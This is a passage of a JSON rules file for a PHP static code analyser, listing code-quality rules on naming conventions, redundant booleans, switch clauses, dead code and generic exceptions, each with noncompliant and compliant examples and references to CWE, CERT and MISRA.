MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n that the first character following the null statement is a white-space character. <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n or while condition <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n public $myField;\n\n public function doSomething() {\n $myField = 0;\n ...\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n <li> final or abstract <\/li>\n <li> public or protected or private <\/li>\n <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ? exp : true;\n$booleanVariable = condition ? exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition && exp;\n$booleanVariable = !condition || exp;\n$booleanVariable = condition && exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n return true;\n} else {\n return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n return $numerator \/ $denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n if (condition1) {\n return true;\n } else {\n if (condition2) {\n return false;\n } else {\n return true;\n }\n }\n return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo() {} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n ...\n }\n\n private function unusedPrivateFunction() { \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n private function Foo(){} \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n public static function doSomething()\n {\n $foo = new Foo();\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n <li> Some value was left unset. <\/li>\n <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) { \/\/ Noncompliant\n doSomething();\n}\n...\nif (false) { \/\/ Noncompliant\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n case 0: \/\/ 6 lines till next case\n methodCall1();\n methodCall2();\n methodCall3();\n methodCall4();\n break;\n default:\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n case 0:\n doSomething();\n break;\n default:\n break;\n}\n\nfunction doSomething(){\n methodCall1(\"\");\n methodCall2(\"\");\n methodCall3(\"\");\n methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n $LOCAL;\n ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n $local;\n ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n function doSomething($a, $b) { \/\/ no issue reported on $b\n compute($a);\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m); \/\/ Noncompliant\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n public function func($n,$m) {\n parent::func($n$m);\n \/\/ do additional things...\n }\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n \/\/ function eliminated\n}\n\nclass Parent {\n public function func($n, $m) {\n \/\/ do something\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n prepare('action1'); \/\/ Non-Compliant - 'action1' is duplicated 3 times\n execute('action1');\n release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nACTION_1 = 'action1';\n\nfunction run() {\n prepare(ACTION_1);\n execute(ACTION_1);\n release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having less than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n class Foo { \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n \/**\n * @var T1\n *\/\n public $a1; \/\/ Foo is coupled to T1\n \/**\n * @var T2\n *\/\n protected $a2; \/\/ Foo is coupled to T2\n \/**\n * @var T3\n *\/\n private $a3; \/\/ Foo is coupled to T3\n\n \/**\n * @param T5\n * @param T6\n *\n * @return T4\n *\/\n public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n $result = new T7(); \/\/ Foo is coupled to T7\n return $result;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n executeSomething();\n checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n executeSomething();\n checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v > 2; }; \/\/ Compliant\n$max_comparator = function ($v) { echo $v; return $v > 2; }; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n do_something();\n} else if (condition2) {\n do_something_else();\n} else {\n throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n if(condition) {\n $i = 20;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++) {\n echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2: \/\/ Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n do_something();\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n case 1:\n foo();\n break;\n case 2:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n case 0: \/\/ Empty case used to specify the same behavior for a group of cases.\n case 1:\n do_something();\n break;\n case 2: \/\/ Use of continue statement\n continue;\n case 3: \/\/ Case includes a jump statement (exit, return, break &etc)\n exit(0);\n case 4:\n echo 'Second case, which falls through';\n \/\/ no break <- comment is used when fall-through is intentional in a non-empty case body\n default: \/\/ For the last case, use of break statement is optional\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n case 0:\n do_something();\n break;\n default:\n do_something_else();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n do_something();\n} else {\n do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses 